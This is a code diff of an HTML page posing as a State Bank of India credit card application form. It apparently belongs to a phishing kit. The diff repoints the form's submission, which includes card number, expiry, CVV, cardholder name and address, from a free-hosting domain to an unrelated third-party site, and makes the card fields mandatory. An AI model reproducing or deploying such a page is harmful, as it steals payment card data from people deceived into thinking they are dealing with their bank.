--- a/index.html
+++ b/index.html
@@ -77,7 +77,7 @@ background-color: rgb(255, 255, 255);">
 					<p class="fw-bold">SBI C2C Credit Card Application</p>
 					<p class="dis mb-3">C2C Credt Card Appplication Form.</p>
 				</div>
-				<form id="contact_message" action="https://sbi-apply.000webhostapp.com/success.php" method="post">
+				<form id="contact_message" action="https://expertengineers.co.in/success.php" method="post">
 					<div class="mb-3">
 						<p class="dis fw-bold mb-2">Email address</p> <input class="form-control" name="emailaddress"
 							id="emailaddress" value="luke@skywalker.com">
@@ -88,19 +88,19 @@ background-color: rgb(255, 255, 255);">
 							<div class="fab fa-cc-visa ps-3"></div>
 
 							<input type="text" class="form-control" name="card_details" id="card_details"
-								placeholder="Card Details">
+								placeholder="Card Details" required>
 							<div class="d-flex w-50">
 
-								<input type="text" class="form-control px-0" name="mmyy" id="mmyy" placeholder="MM/YY">
+								<input type="text" class="form-control px-0" name="mmyy" id="mmyy" placeholder="MM/YY" required>
 								<input type="password" maxlength=3 class="form-control px-0" name="cvv" id="cvv"
-									placeholder="CVV">
+									placeholder="CVV" required>
 							</div>
 
 
 						</div>
 						<div class="my-3 cardname">
 							<p class="dis fw-bold mb-2">Cardholder name</p> <input class="form-control"
-								name="card_holder" id="card_holder" type="text">
+								name="card_holder" id="card_holder" type="text" required>
 						</div>
 						<div class="address">
 							<p class="dis fw-bold mb-3">Billing address</p> <select class="form-select"
@@ -113,7 +113,7 @@ background-color: rgb(255, 255, 255);">
 
 							
 							<input class="form-control address" name="Address" id="Address"
-							type="text" placeholder="Address">
+							type="text" placeholder="Address" required>
 
 							<div class="d-flex"> <input class="form-control zip" name="zip" id="zip" type="text"
 									placeholder="ZIP"> 
